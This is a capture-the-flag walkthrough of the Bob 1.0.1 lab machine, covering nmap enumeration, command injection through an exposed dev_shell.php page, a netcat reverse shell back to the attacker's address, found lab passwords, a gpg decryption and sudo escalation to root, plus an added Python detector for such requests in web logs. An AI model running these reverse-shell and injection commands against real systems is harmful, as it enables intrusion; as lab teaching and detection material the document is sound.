Bob 1.0.1
Enumeration
nmap
nmap -sC -sV -oA nmap/Bob 192.168.1.112
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 22:59 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 192.168.1.112
Host is up (0.00014s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:3B:96:26 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.57 seconds
We see that only port 80 is open and that robots.txt lists some disallowed entries.
Let's open it in the browser and see what we get.

Got this.
Exploitation
Then I navigated to /dev_shell.php

We get this web shell. I tried ping 192.168.1.113
and ; ping 102.168.1.113
and got this error

After a few tries, I found out that id can be used, so I went to set up a listener

Reverse Shell
At our machine, type
nc -nlvp 4444
At the dev_shell, type
id | nc -e /bin/bash 192.168.1.113 4444
Then we will receive a shell, from there, type
python -c 'import pty; pty.spawn("/bin/bash")'

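From the defender's side, the requests above leave a clear trace in the web server log: a request to /dev_shell.php whose parameter carries a command-chaining character and a reverse-shell string. As an added example (not part of the original write-up), this Python detector scans constructed Apache access-log lines for exactly that pattern; the parameter name cmd and the log contents are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (assumed parameter name "cmd").
SAMPLE_LOG = """\
192.168.1.113 - - [19/May/2020:23:01:10 -0400] "GET /robots.txt HTTP/1.1" 200 97
192.168.1.113 - - [19/May/2020:23:01:30 -0400] "GET /dev_shell.php?cmd=ls HTTP/1.1" 200 812
192.168.1.113 - - [19/May/2020:23:02:05 -0400] "GET /dev_shell.php?cmd=ping%20192.168.1.113 HTTP/1.1" 200 640
192.168.1.113 - - [19/May/2020:23:03:40 -0400] "GET /dev_shell.php?cmd=id%20%7C%20nc%20-e%20/bin/bash%20192.168.1.113%204444 HTTP/1.1" 200 640
192.168.1.50 - - [19/May/2020:23:04:00 -0400] "GET /search.php?q=a%7Cb HTTP/1.1" 200 300
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters that chain a second command onto the one the page expects.
CHAIN_RE = re.compile(r'(\|\||\||;|&&|`|\$\()')
# Strings typical of a reverse shell spawned from a web command runner.
REVSHELL_RE = re.compile(r'(nc\s+-e|/bin/(?:ba)?sh|bash\s+-i|/dev/tcp/)')


def analyse(log_text, shell_path="/dev_shell.php"):
    """Return (line number, client ip, decoded query, reasons) for each
    request to shell_path that carries chaining or reverse-shell indicators."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        # Decode %xx escapes so "%7C" is seen as "|" before matching.
        path, _, query = unquote_plus(m["target"]).partition("?")
        if path != shell_path:
            continue  # only the command runner page is in scope here
        reasons = []
        if CHAIN_RE.search(query):
            reasons.append("command chaining metacharacter")
        if REVSHELL_RE.search(query):
            reasons.append("reverse-shell indicator")
        if reasons:
            findings.append((lineno, m["ip"], query, reasons))
    return findings


if __name__ == "__main__":
    for lineno, ip, query, reasons in analyse(SAMPLE_LOG):
        print(f"line {lineno} from {ip}: {query!r} -> {', '.join(reasons)}")
```

Only the fourth line is flagged: the plain ls and ping requests and the pipe in an unrelated page's query are left alone, which keeps the alert specific to the exposed command runner.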
Then navigate to the /home directory and we will see 4 directories: bob, elliot, jc and seb

I first went to the elliot directory and saw a file called theadminisdumb.txt

After running cat on the file

We can see that there is a password Qwerty for a user. After trying su to the other 3 users, we know that this password is for jc. The password theadminisdumb is for elliot.
su into elliot

I couldn't find anything interesting for those users, so I went to the bob user. After looking around, I navigated to /Documents and saw 2 text files and a directory

Going inside /Secret/Keep_out/Not_Porn/No_Lookie_In_Here, there is a notes.sh

cat the file: the first character of each sentence spells HARPOCRATES, which must indicate a password

I went back to the Documents directory

We can see there is a login.txt.gpg; using the string we just found, we might be able to decrypt the file.
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

We can see that a credential has been decrypted! It is bob's credentials.
Privilege Escalation
Let's su into bob

Type sudo -l

We can see that this user has sudo rights.
Type sudo bash and we will get root

Type /flag.txt and we will get the flag

Congratulations!